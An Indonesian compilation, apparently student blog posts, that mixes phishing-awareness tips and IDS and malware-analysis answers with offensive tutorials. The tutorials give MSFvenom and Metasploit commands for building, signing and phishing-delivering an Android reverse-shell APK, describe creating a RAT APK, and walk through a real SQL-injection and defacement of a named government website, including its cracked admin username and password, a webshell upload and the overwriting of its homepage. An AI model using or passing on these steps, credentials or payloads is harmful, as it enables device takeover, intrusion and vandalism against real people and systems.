Phishing adalah salah satu teknik penipuan yang masih sering terjadi di internet. Umumnya phishing ini dilakukan dengan mengirimkan email atau sebuah link website yang seolah-olah penting dan resmi, terus meminta kita menginput data-data pribadi kita. Terus nanti data pribadi tersebut dicuri, yang akibatnya bisa merugikan kita secara finansial.
Contohnya misalnya saya dapat email yang bilang bahwa saya baru saja memenangkan undian Iphone. Nah untuk mengirimkan iphone tersebut saya diminta menginput data-data pribadi saya. Kalo dapat email atau pesan seperti ini, please jangan di klik. Teknik ini sering memberikan tawaran atau iming-iming hadiah yang menggiurkan
Contoh lainnya misalnya saya mendapat email super penting dari bank X, bahwa rekening saya ada masalah, dan akan diblok, supaya akun saya tidak diblokir, saya harus menginput data-data pribadi saya segera. Teknik ini biasanya bersifat super penting, dan harus segera direspon
Ciri lainnya kita mendapat link sebuah website yang sudah dimodifikasi, sangat mirip dengan link aslinya, padahal palsu. Contohnya dulu pernah ada kasus web klikbca.com; ada orang yang mendaftarkan alamat palsu clickbca.com, klickbca.com dst
Selain itu bisa juga dalam bentuk attachment email yang mencurigakan, atau email dari pengirim yang mencurigakan.
Ada banyak lagi teknik phishing. Info lebih lengkapnya bisa dilihat pada link berikut ini:
1. Kenali linknya biasanya linknya apabila acak-acakan berarti palsu atau istilahnya tidak ada tingkat keamanannya
2. Jangan asal klik link, jika kita klik link itu akan terindeks atau terekspos datanya ke server yang sudah di klik biasanya bagi orang pihak ketiga biasanya akan membuat tampilan semirip mungkin sehingga korban akan mengisi data tersebut tanpa berhati-hati
3. Pastikan juga website tersebut sudah memiliki sertifikat ssl atau website tersebut sudah bisa menggunakan protocol https
4. Selalu update web browser pada android, ios dan juga windows
5. Dan hati-hati jika dimintai data pribadi seperti email, nama, nomor kependudukan dsb
Pada hari ini dalam senggang, kita akan mempelajari cara meretas perangkat seluler Android menggunakan MSFvenom dan kerangka Metasploit. Kami akan menggunakan MSFvenom untuk menghasilkan payload, menyimpannya sebagai file .apk dan menyiapkan listener untuk kerangka Metasploit. Setelah pengguna / korban mengunduh dan menginstal .apk berbahaya, penyerang dapat dengan mudah mendapatkan kembali sesi di Metasploit. Untuk melakukannya, penyerang perlu melakukan manipulasi psikologis untuk memasang .apk di perangkat seluler korban.
Kami akan mendemonstrasikan ini dengan menggunakan alat-alat berikut
– Kali Linux bisa di vmware / virtualbox
– Perangkat / emulator Android
– Zipalign
– VMware atau VirtualBox (lingkungan virtual)
Setelah penyiapan berikut dikonfirmasi tanpa kesalahan, maka kami siap.
Step 1: Menjalankan Kali Linux Sebelum kita mulai, mari kita bahas tentang MSFvenom. Ini adalah kombinasi dari MSFpayload dan MSFencode. Alat-alat ini sangat berguna untuk menghasilkan payload dalam berbagai format dan mengenkode payload ini menggunakan berbagai modul encoder. Menggabungkan kedua alat ini menjadi satu alat sangatlah masuk akal. Ini menstandarkan opsi baris perintah, mempercepat sedikit dengan menggunakan satu contoh kerangka kerja dan menangani semua format keluaran yang mungkin. MSFvenom digunakan untuk membuat payload menembus emulator Android. Dengan menggunakan MSFvenom, kami membuat file .apk muatan. Untuk ini, kami menggunakan perintah berikut: Terminal: msfvenom –p android/meterpreter/reverse_tcp LHOST=Localhost IP LPORT=LocalPort R > android_shell.apk
Figure 1: MSFvenom payload
-p — Payload to be used
LHOST — Localhost IP to receive a back connection (Check yours with ifconfig command)
LPORT — Localhost port on which the connection listen for the victim (we set it to 4444)
R — Raw format (we select .apk)
Location — To save the file
Note: Dalam perintah ini, kami telah menggunakan alamat lokal karena kami mendemonstrasikan di lingkungan lokal. Untuk tampil di jaringan publik, Anda harus memasukkan alamat publik Anda di LHOST dan mengaktifkan penerusan port di router. Setelah perintah ini, sekarang Anda dapat mencari file Anda di desktop dengan nama android_shell.apk.
Figure 2: APK file sudah dibuat
Setelah kami berhasil membuat file .apk, kami perlu menandatangani sertifikat karena perangkat seluler Android tidak diizinkan untuk memasang aplikasi tanpa sertifikat yang ditandatangani dengan benar. Perangkat Android hanya memasang file .apk bertanda tangan / sign certificate. Dibutuhkan sign certificate .apk file secara manual di kali linux :
Keytool (preinstalled)
jar signer (preinstalled)
zipalign (need to install)
Untuk install sign certificate pada .apk kita maka gunakan perintah sebagai berikut Terminal: keytool -genkey -V -keystore key.keystore -alias hacked -keyalg RSA -keysize 2048 -validity 10000
Figure 3: Keytool
Lalu gunakan perintah dibawah sebagai berikut Terminal: jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore key.keystore android_shell.apk hacked
Figure 4: Install jarsigner .apk
Selanjutnya adalah gunakan terminal dibawah Terminal : jarsigner -verify -verbose -certs android_shell.apk
Figure 5: Verifikasi.apk menggunakan JARsigner
Apabila belum install zipalign maka harus diinstall dulu dengan perintah seperti gambar dibawha
Figure 6: Instalasi Zipalign
Lalu gunakan perintah zipalign terhadap .apk yang sudah di buat tadi Terminal: zipalign -v 4 android_shell.apk singed_jar.apk
Figure 7: Verifikasi the .apk menggunakan Zipalign
Sekarang kami telah berhasil menandatangani file android_shell.apk kami dan dapat dijalankan di lingkungan Android apa pun. Nama file baru kami adalah singed_jar.apk setelah verifikasi dengan Zipalign.
Figure 8: .apk target sudah terinstall
Tahap selanjutnya adalah menggunakan aplikasi metasploit untuk generate payload nya Terminal: msfconsole
Figure 9: Starting Metasploit
Metasploit begins with the console.
Figure 10: Tampilan Metasploit
Sekarang luncurkan atau jalankan exploit multi/handler dan gunakan android payload untuk bisa mendapatkan isi dari targetnya atau bisa dikontrol menggunakan metasploit. Terminal: use exploit/multi/handler
Figure 11: Setup exploit
Selanjutnya, setel opsi untuk payload, IP listener (LHOST) dan listener PORT (LPORT). Kami telah menggunakan IP localhost, nomor port 4444 dan payload android / meterpreter / reverse_tcp saat membuat file .apk dengan MSFvenom. Note : Untuk alamat ip disesuaikan alamat ip dari hp target atau harus dalam satu jaringan sebagai contoh menggunakan Wifi untuk mengetahui alamat ip dari target silahkan gunakan aplikasi Ip-checker dsb
Figure 12: Setup the exploit
Kemudian kita berhasil menjalankan exploit untuk reverse connection. Terminal: run
Figure 13: Eksekusi exploit
Selanjutnya, kita perlu menginstal file .apk Android yang berbahaya ke perangkat seluler korban. Di lingkungan kami, kami menggunakan perangkat Android versi 8.1 (Oreo). Penyerang dapat membagikan APK Android berbahaya kepada korban dengan bantuan rekayasa sosial / phishing email. Sekarang saatnya menyiapkan emulator Android dengan cepat (jika Anda tidak memiliki perangkat Android). Langkah-langkah untuk mengonfigurasi emulator Android: Unduh file gambar untuk proyek kode Android x86 dari situs proyek Google Code (https://code.google.com/archive/p/android-x86/downloads) Buat mesin virtual menggunakan kernel versi 2.6x lain di workstation VMware Pasang file ISO ke opsi VMware Selesaikan proses dan jalankan mesin dalam mode LIVE Siapkan perangkat Android Siapkan akun Google Catatan: Proyek Android x86 dapat menghubungkannya ke jaringan lokal dengan adaptor Ethernet (VMnet8). Jika Anda menggunakan emulator lain untuk menembus perangkat Android, Anda juga dapat menggunakan emulator Android CLI. Setelah mengatur emulator Android di VM, kami akan mengunduh file dari tautan cloud yang telah kami buat di Kali Linux dan dikirim melalui email ke akun korban.
Figure 14: Spam email
Download file yang tadi .apk yang sudah kita buat lalu install kan pada Android tapi disarankan jangan hp langsung, gunakan emulator untuk pengujian.
Figure 15: Download file .apk
Jalankan .apk tersebut
Figure 16: Install aplikasi .apk
Jika sudah di install pada target maka kita kembali lagi ke kali linux Kita bisa lihat target sudah bisa masuk pada gambar dibawah
Figure 17: Target
Untuk mengetahui target gunakan perintah ? atau help command, kamu akan melihat banyak perintah yang bisa digunakan untuk target Note : Gunakan Aplikasi ini pada emulator seperti nox, bluestack dsb. dikarenakan akan terdampak bahaya apabila digunakan langsung pada hp android. terima kasih sekian
Jelaskan apa fungsi Intrusion Detection System (IDS) pada sebuah sistem keamanan jaringan!
Jelaskan apa perbedaan IDS dan IPS!
Pada proses deteksi serangan dikenal istilah False Positif dan False Negatif. Jelaskan apa yang dimaksud dengan False Positif dan False Negatif!
Jelaskan apa yang dimaksud dengan metode deteksi Signature Based!
Jelaskan apa yang dimaksud dengan metode deteksi Anomaly Based!
Sebutkan 3 contoh tools IDS!
Jawaban
1.Intrusion Detection System (disingkat IDS) adalah sebuah metode yang dapat digunakan untuk mendeteksi aktivitas yang mencurigakan dalam sebuah sistem atau jaringan. IDS dapat melakukan inspeksi terhadap lalu lintas inbound dan outbound dalam sebuah sistem atau jaringan, melakukan analisis dan mencari bukti dari percobaan intrusi (penyusupan).
2.IDS (intrution detection system) adalah sebuah sistem yang melakukan pengawasan terhadap lalu lintas (traffic) jaringan dan pengawasan terhadap kegiatan kegiatan yang mencurigakan didalam sebuah sistem jaringan. intrusion prefention system
(IPS), adalah pendekatan yang sering digunakan untuk membangun sistem keamanan komputer,IPS mengkombinasikan teknik firewall dan metode IDS dengan baik
3.False positif – adalah peringatan yang dihasilkan oleh IDS karena telah mendeteksi adanya serangan yang valid terhadap sistem yang kita monitor, tetapi serangan itu sendiri tidak valid. Atau dengan kata lain, kita mendapat laporan serangan, padahal itu bukan serangan. Ini adalah masalah bagi kita karena banyaknya peringatan yang dibuat oleh IDS padahal serangan yang sebenarnya tidak terjadi. False positif bisa saja terjadi karena adanya serangan pada sistem yang tidak di monitor.
False negatif – adalah serangan yang benar-benar terjadi tetapi tidak terdeteksi oleh IDS. IDS bisa melewatkan serangan karena menganggap serangan yang dilakukan tidak sesuai dengan aturan yang ada (rule), atau karena terlalu banyak serangan, atau bisa juga karena penyerang berhasil melumpuhkan IDS. Dampak dari false negatif ini artinya penyerang berhasil melewati IDS, sama artinya dengan ada yang menyerang kita, tapi kita tidak menyadarinya!
4.Signature detection – IDS yang bekerja menggunakan signature (rule/peraturan) akan mendeteksi serangan jika ada traffic network yang masuk ke dalam daftar serangan. Signature – lah yang menentukan paket yang masuk ke network tersebut merupakan serangan atau biasa disebut “bad traffic”. Kekurangan dari metode ini adalah bahwa IDS hanya bisa mendeteksi suatu serangan yang telah terdaftar sebelumnya di dalam signature. Oleh karena itu, metode ini akan kesulitan menghadapi daftar serangan jenis baru. Bila kita menggunakan signature detection mungkin akan berdampak sedikitnya peringatan false positif tetapi banyak false negatif.
5.Anomaly detection – IDS yang menggunakan anomaly detection bekerja menggunakan cara yang berbeda. IDS akan mengenal traffic “normal” jaringan kita dan akan mulai mengingatkan kita bila ternyata ada traffic yang “abnormal”. Masalahnya adalah, sesuatu yang baru atau berbed
a juga bisa dianggap abnormal. Jadi jika kita menggunakan metode ini IDS akan memberikan sedikit false negatif tetapi banyak false positif.
Jelaskan bagaimana cara antivirus mendeteksi malware!
Jawaban
1.Static Analysis : Merupakan metode yang digunakan untuk melakukan analisa malware dengan cara mengamati secara langsung kode sumber (source code) malware tersebut. Dalam mengamati kode sumber malware, terdapat teknik yang umumnya digunakan, yaitu Reverse Engineering.
2.Dynamic Analysis : Merupakan metode yang digunakan untuk melakukan analisa terhadap malware dengan mengamati kinerja sistem yang dapat terlihat dari perilaku sistem sebelum malware dijalankan dengan perilaku sistem setelah malware tersebut dijalankan pada sistem tersebut. Metode dynamic analysis umumnya menggunakan software virtual seperti VirtualBox, VMWare dan lain-lain, sehingga apabila malware yang dijalankan tersebut ternyata merusak sistem, maka sistem utama tidak mengalami kerusakan akibat malware tersebut.
3.reverse engineering adalah proses penemuan prinsip-prinsip teknologi dari suatu perangkat, objek, a
tau sistem melalui analisis strukturnya, fungsinya, dan cara kerjanya. Proses ini biasanya melibatkan pemisahan (perangkat mesin, komponen elektronik, program komputer, atau zat biologi, kimia, atau organik) dan analisis terhadap cara kerjanya secara terperinci, atau penciptaan perangkat atau program baru yang memiliki cara kerja yang sama tanpa memakai atau membuat duplikat (tanpa memahami) benda aslinya. Pada dasarnya, prinsip rekayasa balik sama dengan penelitian ilmiah, namun objek yang ditelaah berbeda. Objek yang ditelaah pada riset ilmiah biasanya adalah fenomena alami, sedangkan pada rekayasa balik, objek yang ditelaah adalah benda buatan manusia.
5.Untuk melakukan analisa malware pertama kita download aplikasi untuk membuat malware ataupun download malwarenya, untuk pengujian malware disarankan harus menggunakan virtualisasi agar aman untuk digunakan, lalu capture hasil dari virus tersebut atau analisis di website online untuk aplikasinya
6.Untuk safe environment atau pun pengujian langsung malwarenya adalah menggunakan virtualisasi agar meminimalisir terjadinya terkena malware secara langsung
7.Sandbox adalah mekanisme keamanan untuk memisahkan program yang sedang berjalan. Istilah ini acap digunakan untuk mengeksekusi kode yang belum diuji, atau program tidak tepercaya yang berasal dari pihak ketiga dan pemasok yang tidak terverifikasi, serta pengguna dan situs web yang tidak tepercaya.
Teknologi sandbox sering kali digunakan untuk menguji program tidak terverifikasi yang mungkin mengandung virus atau kode jahat lainnya, tanpa harus membiarkan perangkat lunak tamu membahayakan perangkat penyedia.
8.Cara antivirus bekerja adalah ketika melakukan scanning file maka aakan mendeteksi apakah file tersebut terinfeksi sebuah virus atau tidak biasanya yang sering ampuh untuk mendeteksi file virus adalah windows defender dikarenakan ada informasi jelas yang sudah menginfeksi file tersebut dan bisa menghilangkannya.
Praktek
Buatlah Sebuah Malware dengan tools 888 RAT, pada gambar dibawah ini adalah proses pembuatan RAT dengan hasil akhirnya adalah apk atau format aplikasi pada android
Dan ketika sudah di scan di website hybrid analysis ditemukan bahwa apk tersebut memiliki malware Trojan pada scan melalui ikarus
Deface adalah teknik mengganti atau menyisipkan file pada server, teknik ini dapat dilakukan karena terdapat lubang pada sistem security yang ada di
dalam sebuah aplikasi.
Defacer website dapat merubah tampilan sebagian atau seluruhnya tergantung kemauan defacer dan lubang yang bisa dimasuki, namun jika dia sudah putus asa, defacer akan melakukan denial of servis (DoS) attack yaitu mengirimkan request palsu pada server yang berlebihan sehingga kerja
server lambat dan lama-kelamaan server akan crash dan down.
1.scanning web korban dengan acunetix disini korban saya http://www.vsi.esdm.go.id maaf ya adamin cuman buat pembelajaran
scanning sampai selesai setelah itu muncul hole atau kerentanan web tersebut
hmmm sepertinya disisni saya akan mengeksekusi web tersebut dengan teknik sql injection
klik sql injection lalu pilih parameternya lalu klik dan muncul keterangan di sebelah kanan tampilan acunetix > lalu launch the attack with http editor
setelah di klik launch the attack with http editor makamuncul jendela baru
copy path injection disini path korban saya /peringatan_dini.php?bulan=9-2+4-2-2&tahun=2012
sekarang waktunya untuk menyuntikkan sql dengan tool havij yang sudah kalian download tadi buka toolnya
lalu pastekan url korban yang telah anda copykan tadi pada kotak target lalu analyze
tunggu sampai scanning selesai dan sukses injection apabila success injection muncul nama database nya dan tombol table telah di buka
alu klik tombol table dan pilih get tables untuk mendapatkan table sql
lau muncul nama-nama table nya pilih sekiranya dimana letak admin login databasenya disini letak admin loginya berada pada table users lalu centang table users lalu klik GET COLOUMNS
setelah mendapatkan coloumn sekarang kita mencari user dan pass loginya dengan men ceklist username dan passwordnya lalu klik GET DATA
tunggu …….
lalu muncul duehh user loginya admin
hmmm…. kayaknya ini password masih di enskripsi hash md5 tapi jangan patah semangat coba kita dekript dulu make tool decrypt online atau john the ripper juga bisa make google database agar pekerjaan kita lebih cepat
disini kita coba decrypt login admin yana soalnya akses levelnya juga admin dan password di google databasenya juga tersedia kita decrypt 930d35238e22c6bf400a959e470d4949 dengan google database buka google lalu pastekan hash md5 pada kolom search
lalu google akan mencari pilih salah satu dari temuan google dan akhrinya berhasil menemukan hash tersebut passwornya adalah merapi jadi loginya user = yana pass = merapi
sekarang password sudah ketemu sekarang yang diakukan adalah mencari halaman ogin web korban dengan tool admin login finder yang telah kalian download tadi buka toolnya dan masukkan alamat url korban pada kolom lalu scan
NAHH . . sudah ketemu loginya sekarang kita coba masuk sebagai admin bersiap siaplah login dengan username & password yang telah kita temukan tadi
dan sukses kita dah masuk sebagai admin
sekarang apa yang kita lakuakan setelah masuk sebagai admin yups . . bener sekali tujuan kita disini adalah merubah tampilan depan web jadi yang kita lakukan adalah menanam shell backdoor pada website korban
apa itu shell backdoor
buat yang suka deface pasti sudah tau tentang Backdoor “pintu be
lakang” alias jalan pintas buat akses log on situs web, gak cuma itu sih kita juga bisa leluasa kalo mengexploitasi web dengan menggunakan Backdoor ( shell ) tanpa harus login sebagai administrator kita punya kuasa yang sama dengan admin aselinya hehe,
setelah itu install dan buka tamper data pada mozilla tools > tamper data
lalu klik start
lalu segera balik ke halaman upload shell.jpg tadi dan segeralah upload lalu muncul dialog pada tamper dta klik TAMPER
lalu pada layar jendela tamper popup di sebelah kanan layar post_data cari shell.jpg disini saya menggunakan becak.jpg lalu cari becak.jpg setelah ketemu rubah ekstensi menjadi .PHP jadinya becak.php
dan sukses di upload shell.php kita dan sekarang kita mencari letak shellnya untuk di panggil
buka lagi judul yang telah kita buat tadi klik edit
lalu klik kanan pada gambar dan pilih copy image location
setelah di copy paste pada adress bar mozilla jadinya
http://vsi.esdm.go.id/foto_banner/becak.php
dan berhasil kita sudah masuk pada shell backdoor
sekarang kita pergi ke halaman depan web tersebut cari index.php / index.html website
dan rubah source kode pada index.php dengan mengkik edit
hapus semua code dalam index.php rubah dengan source code html kalian atau bisa langsung upload file index.html kalian dan lihat hasinya